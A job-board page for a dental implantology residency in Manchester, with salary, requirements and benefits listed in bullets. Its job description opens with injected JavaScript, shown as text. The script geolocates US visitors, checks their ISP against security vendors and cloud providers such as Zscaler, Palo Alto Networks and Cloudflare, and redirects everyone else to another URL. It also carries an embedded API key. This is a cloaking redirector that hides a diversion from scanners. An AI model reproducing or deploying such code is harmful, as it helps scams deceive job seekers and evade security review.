Dental Clinician

Manchester, ENG
February 8, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://uk.indeed.com/tmn/ccs/50016a57b2e6a013/2dea85e7a3a2b5cc2f3c8779bacd2d5c88b6f35302eac7396dc111570eecb15f/2765583331732878?sf=vKb00’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

Ambitious dentists seeking to specialize in fully digital implantology are encouraged to apply for a structured clinical residency program.

  • Training focuses on guided full jaw implant solutions, immediate prosthetics, and digital workflows without physical models.

  • Participants will learn digital data capture (CBCT, intraoral, face scanning), case planning, surgical guidance, and prosthetic fitting.

  • The program offers mentorship from experienced clinicians, with a 3-month foundational training period and ongoing case review.

  • No prior implantology experience is necessary; attitude and motivation are prioritized.

  • Roles can start part-time and develop into full-time positions with salary progression (£85k to £120k+).

  • Requirements include GDC registration, UK work authorization, a positive attitude, and good communication skills.

  • Benefits include a supportive team, modern digital clinics, administrative support, and opportunities for rapid career advancement.

  • Application involves submitting a CV, interview process, and possibly attending an open day.